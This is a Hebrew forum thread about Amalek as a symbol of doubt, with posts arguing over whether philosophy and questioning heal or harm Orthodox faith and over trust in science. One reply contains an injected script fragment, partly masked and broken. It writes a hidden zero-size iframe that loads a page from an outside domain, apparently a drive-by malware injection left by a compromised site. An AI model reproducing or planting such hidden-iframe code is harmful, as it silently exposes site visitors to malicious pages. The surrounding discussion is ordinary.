| נשלח ב-15/3/2019 15:39 |
|
| |
הרפואה הפילוסופית
הסיפור על עמלק הוא כנראה ההזדמנות של דרשנים לאשש את האמונה היהודית החרדית המודרנית דרך סמלים עתיקים מן המדרש. (אני: רגע, קרא שוב מה שכתבת. אתה בטוח שאתה רוצה להיות כל כך תוקפני? עצמי: טוב, שיישאר, אבל תסביר בנחת. אלו דברים רגישים. איך אומרים, "בנפשנו הדבר"). תרשו לי לצטט מאמר השקפתי. הרב דוד ברוורמן נלחם מול הספקנות דרך הסמל של עמלק ומתחיל בבדיחה שככל שהיא נחמדה, הצליחה לצער אותי. הנה הבדיחה: בקהילה יהודית בארצות הברית הוכתר רב, ולא סתם רב אלא "הרב דוקטור", כלומר דוקטור לפילוסופיה. הבדיחה ממשיכה: קשיש אחד מתקשר לרב הדוקטור. כואב לו הלב. אולי הדוקטור יעזור? לא, לך לקרדיולוג, משיב הרב. אחרי שבוע הבעיה היא כאבי ראש. הפעם הרב שולח אותו לנוירולוג. בפעם השלישית, אחרי כאבי רגלים והפניה לאורתופד, הרב מאבד את סבלנותו. "אני דוקטור לפילוסופיה". והקשיש, עם משפט המחץ: "פילוסופיה, איזו מחלה זו?" סוף הבדיחה. לפחות לפי המאמר ההשקפתי של יתד נאמן, ז אדר ב תשע"ט עמ' 13. כמה חבל. היו צריכים לתת לרב הדוקטור להמשיך לדבר, בלי להתרגז. אז הוא היה יכול להסביר, כפי שהייתי עושה אילו הייתי שם: פילוסופיה, יקירי, אינה מחלה. פילוסופיה היא תרופה. פילוסופיה היא רפואה. אבל לא לגוף – אלא לנפש
 |
|
|
|
|
| נשלח ב-15/3/2019 15:40 |
|
| |
המלחמה העתיקה
מי שקורא את המדרשים המודרניים יכול להתרשם שכל העולם זירה ואנו היהודים לא השחקנים אלא החיילים. מצד אחד אנחנו, היהודים האורתודוכסים, שארית הפליטה הנצורה, הנלחמת על נפשה מול דרקוני הרשע. מצד שני – טוב, כל העולם כולו. העמלקים, היוונים של אנטיוכוס, הפילוסופים היווניים ותלמידיהם בעלי המידות הרעות, המדענים שביקשו לחשוב לבד ולא להסתמך על המסורת, הביולוגים שהמציאו את האבולוציה רק כדי לומר שהכל טבע ואין נס, ההיסטוריונים שהעזו לחשוף טעויות בחשבונות של חז"ל, וכעת – כולם יחד נגדנו. אבל כולם בעצם עמלקים. כי עמלק זה ספק. ומי שלא מאמין, שיעשה את הגימטריה, ואין הוכחה גדולה מזו, כי אם המספרים זהים, זו מציאות שמעבר למציאות. (ואבוי לפילוסוף האנליטי שיעז לשאול למה זו בעצם הוכחה, מה הנחות היסוד של הגישה הזו, מהיכן למדנו זאת ואיך זה שאותה שיטה יכולה להביא לתוצאות הפוכות. גם הוא עמלקי, זה בטוח). כמה טוב: לנו יש רק את התורה. טוב שעדיין לא קמו החוקרים שבודקים את התורה ומפרקים אותה לחלקים. יש תורה בכתב ויש תורה שבעל פה. יש תלמוד ויש פירושים. יש תוספות, והמצאות ופרשנויות. קבלה, חסידות, כל אלו הן תופעות מאוחרות. וגם המנהגים, שאפילו כותב המאמר משבח כדי להראות איך מחסלים את עמלק. (אני: עדיף למחוק, זה לא הנושא כאן. תילחם במנהגים פעם אחרת. עצמי: צודק). הנה עוד כמה ציטוטים מובחרים, אבל באמת. "מובן לכל שמדובר באויב אדיר ועוצמתי מאין כמוהו, שכל אומות העולם שונאי ישראל לאורך הדורות כקליפת השום מולו". זאת מפני שלפי "הפנימיות" זו לא אומה פיזית שצריך להשמיד, אלא פרופיל התנהגותי או צורת חשיבה. זהירות: לא תמיד מזהים אותה בתחילתה, אבל אם היא חודרת פנימה לנפש, היא מכרסמת אותה עד להתמוטטות. זה הספק. לעורר ספקות זו דרכו של עמלק. "אולי תבדוק שוב?" "אולי זה לא כמו שכתוב?" עד כאן דברי הרב ד. ברוורמן נרו יאיר.
 |
|
|
|
|
| נשלח ב-15/3/2019 15:41 |
|
| |
ספק בתור רפואה
תרשו לי להביע עמדה הפוכה. הספק הוא התקדמות. הספק הוא רפואה. הספק הביא את המדע. (כמובן, לא רק הוא). הספק הביא אותנו למאה העשרים ואחת עם האנטיביוטיקה. הפיל את הרודנות של המלכים ויפיל, בעז"ה, את הרודנות של הפוליטיקלי קורקט. הספק הוא כלי העבודה, לא של הכופר וגם לא של המתלבט, אלא של התלמיד חכם. השאלה "מנלן" היא שאלה שלקוחה היישר מן התלמוד שלנו, והיא הבסיס שלו. עם השאלה הזו אפשר לשבור הרבה פסלים. אפשר לברר שמנהגים זה לא הלכה. "פנימיות" זה לא תורה. "קבלה" היא לא מסורת. הפילוסופים היווניים ותלמידיהם לא כולם היו רודפי תענוגות. לפעמים בדיוק להפך. תורה לא היתה להם אבל חכמה דווקא כן, ולפעמים גם עבודת מידות. איני רוצה לשבח נכרים סתם, אבל מומלץ פעם לדרשנים לקרוא קצת על הסטואה, למשל. הפילוסופיה היא ההפך משטחיות. הפילוסופיה היא התשובה לכופרים, לאלו שמכריזים בשטחיות שיש להם שאלות ללא תשובות. לאלו שבורחים מלחשוב. כמובן, כל ההצהרות שלי אינן שוות הרבה בלי להדגים. אולי בפעם אחרת. (אתם רואים שלצערי לא יוצא לי להגיע לכאן כפי שאני מתאווה. ה' יעזרני להוסיף חיל). במקום זה, אוסיף דרשנות משלי על הפשט ועל הדרש אודות טיבו של עמלק. העמלק המקראי, זה שאלוקים מתחייב להשמיד, ומטיל עלינו את המשימה, הוא עם נוודים, שודד דרכים, שאין לו פרנסה אלא לקחת את מה שאחרים עבדו עליו, להרוג או לקחת עבדים ושפחות את החלשים. הוא סוג של פרזיט. הקרבנות שלו הם אלו החלשים, אלו אשר בשולי המחנה, אלו שאין להם כוח להתקדם עם הקצב של כולם, וגם לא להגן על עצמם, ואין להם את הגנה הרוב כיון שהם נשארו בסוף, או בחוץ. זה לא הפשט, אבל באמת אפשר לדרוש זאת על המאבק מול הכפירה. הכפירה פוגעת בחלשים מפני שהם נבהלים מהר מדי, מפני שאין להם תשובות ואינם יודעים לחפש תשובות. כאשר מנפצים את המסורת התמימה שלהם – כאשר המסורת שלהם מתנפצת לנגד עיניהם כאשר הם מגלים שבתוך המסורת דורשים מוריהם לכלול שטויות והבלים, תוספות מודרניות ובזבוזי זמן – אז הם מתפרקים. הפילוסופיה יכולה להציל אותם. הרב הדוקטור יכול להציל אותם. הוא יכול ללמד אותם להבדיל בין עיקר לטפל, בין היהדות המקורית של התנ"ך והתלמוד לבין תוספות שונות שנדבקו עליה. הוא יכול לספק להם ראיות לאמונותם. לא הוכחות מתמטיות כפי שרוצים להאמין שיש, כפי שהאמינו, נניח, החזו"א והרב אלחנן וסרמן. זה לא כל כך פשוט, לצערנו. אבל בהחלט יש תשובות. צריך רק ללמוד. וצריך את הרב הדוקטור שידע להסביר. איפה הרבנים הפילוסופים שלנו? איפה הישיבה שבה ילמדו רבנים כאלו? איפה בית המדרש לרבנים שבו ילמדו מורים לרבנים עבור ישיבות כאלו? אתם יודעים מה? אני מעז לדמיין.
מיליונרים או מיליארדרים או בעלי תקציבים מוזמנים לפנות למייל של כותב שורות אלו כדי לדון בהקמת בית מדרש לרבנים פילוסופים וגם רבנים פילוסופים שיכולים ללמד שם. הבה נילחם בעמלק בדרך היחידה שבאמת עוזרת. על ידי לימוד והבנה.
|
|
|
|
| נשלח ב-17/3/2019 12:50 |
|
| |
ינוח
| מיימוני כתב: |  |
וגם רבנים פילוסופים שיכולים ללמד שם.
< type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");> |
|
יפה. יש שמות הרבנים האמורים ללמד?
***הספק הביא את המדע.*** במקום "הספק" הייתי אומר "השאלה". במילה "ספק" יש משהו שלילי מנטלי, הוא יותר מביא פחד. על "הספק" יש להתגבר ב"שאלה" ביושר פנימי.
|
|
| נשלח ב-17/3/2019 15:39 |
|
| |
מיימוני, חשבת על הרעיון שאתה בעצמך דרשן? אתה מצייר את המטרה סביב ה'ספק' הקדוש שלך וטוען טענה פרשנית דרשנית שהספק הוא זה שהביא את האנטיביוטיקה וכו' אתה מחליט שהספק שינה את העולם, ומספר את כל הסיפור לפי הדרוש שלך, בערך כמו יובל נח הררי. אחרים יטענו שהמטריאליזם או האתאיזם הם אלו ששינו את העולם. שיא הגיחוך היא טענתך שהספק ינצח את הפוליטיקל קורקט, והרי הפוליטיקל קורקט שולט באופן מוחלט באקדמיה, שהיא לכאורה מובלת ע"י הספק שהביא את האנטיביוטיקה, ואינו שולט בבסטות במחנה יהודה ובשאר מעוזי הליכוד, שכנראה הספק הקדוש אינו כוס התה שלהם. בקיצור דרוש נאה דרשת. רק אל תזלזל בדרשנים אחרים. וכמובן תלוי במה מטילים ספק ובמה לא, כן, את זה גם יתד נאמן יודע, הוא מטיל ספק בפלג הירושלמי, הוא מטיל ספק בגויים הרשעים, בחילונים עם הנגיעות. אז מה שקדוש הוא לא הספק, אלא פשוט לדעת למי להאמין (לממסד המדעי!!!) ולמי לא (לדרשנים!!)
|
|
|
|
|
| נשלח ב-17/3/2019 15:52 |
|
| |
יפה דרשת, פרוגרמי. אבל אי אפשר לזקק טיעון מתוך מה שכתבת. מיימוני רוצה לבחון אילו רכיבים מהחרדיות עומדים במבחן ה'מנלן' ולהגדיר אי אילו עקרונות בצורה זהירה יותר, ותו לא מידי. המסקנה הרלטיביסטית שלך שאין הבדל בין להאמין לדרשנים ובין להאמין לממסד המדעי היא לגמרי מופרזת. בסופו של דבר איתמחי 'הממסד המדעי' הנורא הזה (במדעי הטבע) ואיתמחי קמיעא בהרבה דברים שעובדים היטב רק על בסיס משוואות מתוחכמות ולא רק על בסיס ניסוי וטעייה (ודין הניין ליה שיאמינו לו בגדול גם על דברים שלא כל אחד יכול להשתכנע בהם ישירות), ו'האמונה' בו נחשבת למסקנה מנומקת. הספק המהולל כאן הוא לא מצב קיומי נצחי אלא כלי לבירור ושמיעת הוכחות משכנעות, ואז הגעה לדעה מסויימת בהסתברות גבוהה.
|
|
|
|
| נשלח ב-17/3/2019 17:22 |
|
| |
ינוח
| פרוגרמי כתב: |  | | אז מה שקדוש הוא לא הספק, אלא פשוט לדעת למי להאמין (לממסד המדעי!!!) ולמי לא (לדרשנים!!) |
|
הרי לא לממסד או לדרשנים, אלא להוכחות אפשר להאמין בערבון מוגבל. והוכחות מבוססות על "שאלה" כמו בכלל חשיבה. הגיון לב הוא בסיס האמונה ומנחה לשאלות.
|
|
| נשלח ב-17/3/2019 19:02 |
|
| |
שולח, לא אמרתי שאין הבדל, אלא שמיימוני עושה כאן דרוש על המערכה. לכל ממסד יש את הנחות היסוד שלו שהוא לא מתעלף להטיל בהם ספק. זה לא אומר שכולם שוים ובודאי לא רלטיביזם. רק לא ההיפך, לא נאומים בפאתוס שהספק הקדוש הוא שהביא את האנטיביוטיקה, תניחו לאנטיביוטיקה וגם לחללית לירח, ותדברו על הנושא, במדה ויש מה לומר עליו.
|
|
|
|
| נשלח ב-17/3/2019 19:03 |
|
| |
והפילוסופיה היא לא בהכרח רפואה, לפעמים היא יותר כמו מחלה.
|
|
|
|
| נשלח ב-17/3/2019 20:31 |
|
| |
אני מסכים שפילוסופיה היא לא ממש מה שחסר ליהדות (חילחול התשובות לשאלות 'מנלן' - כן), וגם שהאנטיביוטיקה נרתמה לעניין על לא עוול בכפה. אבל מיימוני לא העלה שום נושא מסויים אלא קריאה להקמת מכון וכו' לבירור שאלות מנלן למינהן, ולכן זה לא כ"כ ממין העניין להציע לו באדיבות להעלות כאן ועכשיו נושא קונקרטי, ובפרט שמן הסתם בפורום הזה מיימוני כבר העלה לפחות פעם אחת את כל הנושאים שנראים לו חשובים. ההיסחפות הרטורית עם האמירה שלכל ממסד יש הנחות יסוד שהוא לא מתעלף וכו' לא הוסיפה דבר. מובן שזו אמירה נכונה באופן כללי - לכל אחד ובכל תחום יש הנחות יסוד והן לא זזות כל כך בקלות. אבל - א' מיימוני רק קרא לברר את השתלשלות המסקנות מההנחות, שזה בהחלט דבר שכל מדען יודע די בקלות (לנסח את ההנחות האקסיומטיות, ומשם לשלשל מתימטית את התוצאות. כל ספר לימוד בפיסיקה מתחיל מהצגה אקסיומטית של חוקי ניוטון ואז גזירה מתימטית של התוצאות מהם (לרבות חוקי שימור). או הצגה אקסיומטית של תורת היחסות הפרטית וגזירת התוצאות המתימטיות מכך. במתימטיקה עצמה זה כמובן עוד יותר בולט). ב' אין להשוות בין הנחות יסוד שאף אחרי שמודעים אליהן בחדות ובבהירות עדיין האדם בוחר לקבל אותן בנפש חפצה (סינתטי אפריורי וכו'), ובין הנחות שאילו האדם היה מודע אליהן בחדות יש סיכוי סביר שיאמר אדעתא דהאי לא אאמינה, ומתוך הערפל הוא חשב שהתמונה האמיתית בהירה יותר ורק בעיניו שלו עומד הנגע. נראה שבמקום לדבר לעניין אני מדבר כרגע על דיבורים על דיבורים לעניין, ולכן אני בכל אופן אחדול בזה.
תוקן על ידי שולח_דברים ב- 17/03/2019 18:33:16
 |
|
|
|
|
| נשלח ב-17/3/2019 23:32 |
|
| |
עד שמישהו מדבר לענין, הוא חדל!
|
|
|
|
| נשלח ב-18/3/2019 06:36 |
|
| |
פרוג א. האם לא הגיוני שרעננות מחשבתית שינתה את העולם? רעננות כזו קשורה לספק. ב. אולי לא חסרה ליהדות פילוסופיה במובנה המקצועי (אולי). אבל האם לא חסרה לה מחשבה על המון שומנים שהיא העלתה? ואולי אין אלו שומנים אבל בכדי להראות זאת יש צורך ב"מנלן". ג. האם אין אצלנו עודף של הנחות יסוד, חלקו אולי אינן עומדות בבקורת השכל הישר הפשוט וחלקן אף נוגדות את המערכת המקורית? ד. זה שיש בעולמות אחרים pc – מה זה קשור?
|
|
|
|
| נשלח ב-18/3/2019 07:49 |
|
| |
תודה לכולם
לאלו שהעירו שהספק לא הביא את האנטיביוטיקה והמדע - נכון.
תיקון: הגישה המדעית הביאה את זה, והגישה המדעית מבוססת על שאלות. ושאלות יש בהן צד של ספק.
לאלו שהעירו שדברי הם דרשנות. נכון מאד. מודה. עדיין דרשנות יכולה למצות רעיונות ולהציע כיוון.
לשולח דברים, שוב, ברוך הבא! דבריך נפלאים.
ולתלמיד לא טועה שהמשיך את הקו. לכולם זרים של איקונים ירוקים עם פרחים לתפארת.
|
|
|
| נשלח ב-18/3/2019 09:12 |
|
| |
תלמיד אין ויכוח להגדיר את השיטה המדעית כספק - זו הגדרה דרשנית חד צדדית יש עוד כמה אפשרויות.... ולגבי רעננות מחשבתית, זו הגדרה שכל אחד יקח לצד שלו ולכשתימצי לומר - יש שיטילו ספק בהטלת הספק - של הצד המנוגד להם...
|
|
|
|
| נשלח ב-18/3/2019 13:10 |
|
| |
פרוגר
משום מה יש לי רושם שאתה מודע לכך שבאוירה השלטת במחוזותינו אין הרבה עידוד למחשבה שאינה עונה אמן (לא בלימוד טכני אלא בחשיבה דתית) אלא שאתה בולע את זה בקלות
|
|
|
|
| נשלח ב-18/3/2019 13:30 |
|
| |
| מיימוני כתב: |  |
לשולח דברים, שוב, ברוך הבא! |
|
חן חן 
תלמיד, מבחינה מסויימת עיקר התועלת במכון כזה היא סוציולוגית, וזו גם הבעייתיות בו: אם יחדש יותר מידי אז הוא בעצם במחוז אחר שהתריס מוגף מפני דבריו, ואם לא יחדש יותר מידי אז כמעט בכדי ספקו ספקייא וטרחו טרחייא. במחוזות אחרים אפשר למצוא עיסוקים שיטתיים ברמה זו או אחרת בכל השאלות שמשיקות ל'מחשבה' (להבדיל משאלות הלכתיות, כמו התחקות אחרי המסע הארוך שעברה כל הלכה עד שמצאה לה מנוח בשולחן ערוך, שכמו כל נושא הלכתי נידונות כרגיל בפירוט).
תוקן על ידי שולח_דברים ב- 18/03/2019 11:30:29
|
|
|
|
|